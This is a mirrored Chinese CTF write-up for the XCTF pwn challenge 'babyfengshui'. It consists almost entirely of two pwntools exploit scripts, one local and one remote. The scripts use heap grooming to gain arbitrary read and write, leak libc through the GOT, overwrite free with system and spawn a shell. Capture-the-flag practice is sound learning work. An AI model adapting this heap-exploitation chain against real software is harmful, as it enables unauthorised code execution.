和媳妇一起学Pwn 之 babyfengshui
source link: https://xuanxuanblingbling.github.io/ctf/pwn/2020/04/04/fengshui/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
和媳妇一起学Pwn 之 babyfengshui
发表于 2020-04-04
| 分类于 CTF/Pwn
题目地址:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4713&page=2
from pwn import *
context(arch='i386',os='linux',log_level='debug')
myelf = ELF("./babyfengshui")
libc = ELF("/lib/i386-linux-gnu/libc-2.23.so")
io = process(myelf.path)
sla = lambda delim,data : (io.sendlineafter(delim, data))
delete = lambda index : (sla("n: ","1"),sla("x: ",str(index)))
show = lambda index : (sla("n: ","2"),sla("x: ",str(index)))
edit = lambda index,len,text : (sla("n: ","3"),sla("x: ",str(index)),sla("h: ",str(len)),sla("t: ",text))
add = lambda size,name,len,text : (sla("n: ","0"),sla("n: ",str(size)),sla("e: ",name),sla("h: ",str(len)),sla("t: ",text))
# heap fengshui
add(0x8,'name0',0x8,'text0')
add(0x8,'name1',0x8,'text1')
delete(0)
add(0x80,'name2',0x8,'text2')
# input system arg $0 to chunk3
add(0x80,'name3',0x8,'$0')
# arbitrary address read
def aar(addr):
edit(2,0x9c,'\x00'*0x98+p32(addr))
show(1);io.recvuntil('description: ')
return u32(io.recv(4))
# lower than heap address write
def aaw(addr,content):
edit(2,0x9c,'\x00'*0x98+p32(addr))
edit(1,len(content),content)
# use aar and aaw to leak libc and hijack got table
libc.address = aar(myelf.got['free'])-libc.symbols['free']
aaw(myelf.got['free'],p32(libc.symbols['system']))
# trigger free(chunk3) to call system($0)
delete(3);io.interactive()
from pwn import *
context(arch='i386',os='linux',log_level='debug')
myelf = ELF("./babyfengshui")
libc = ELF("/lib/i386-linux-gnu/libc-2.23.so")
io =remote('111.198.29.45',56768)
sla = lambda delim,data : (io.sendlineafter(delim, data))
delete = lambda index : (sla("n: ","1"),sla("x: ",str(index)))
show = lambda index : (sla("n: ","2"),sla("x: ",str(index)))
edit = lambda index,len,text : (sla("n: ","3"),sla("x: ",str(index)),sla("h: ",str(len)),sla("t: ",text))
add = lambda size,name,len,text : (sla("n: ","0"),sla("n: ",str(size)),sla("e: ",name),sla("h: ",str(len)),sla("t: ",text))
# heap fengshui
add(0x8,'name0',0x8,'text0')
add(0x8,'name1',0x8,'text1')
delete(0)
add(0x80,'name2',0x8,'text2')
# input system arg $0 to chunk3
add(0x80,'name3',0x8,'$0')
# arbitrary address read
def aar(addr):
edit(2,0x9c,'\x00'*0x98+p32(addr))
show(1);io.recvuntil('description: ')
return u32(io.recv(4))
# lower than heap address write
def aaw(addr,content):
edit(2,0x9c,'\x00'*0x98+p32(addr))
edit(1,len(content),content)
# use aar and aaw to leak libc and hijack got table
libc.address = aar(myelf.got['free'])-0x070750
aaw(myelf.got['free'],p32(libc.address+0x03a940))
# trigger free(chunk3) to call system($0)
delete(3);io.interactive()
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK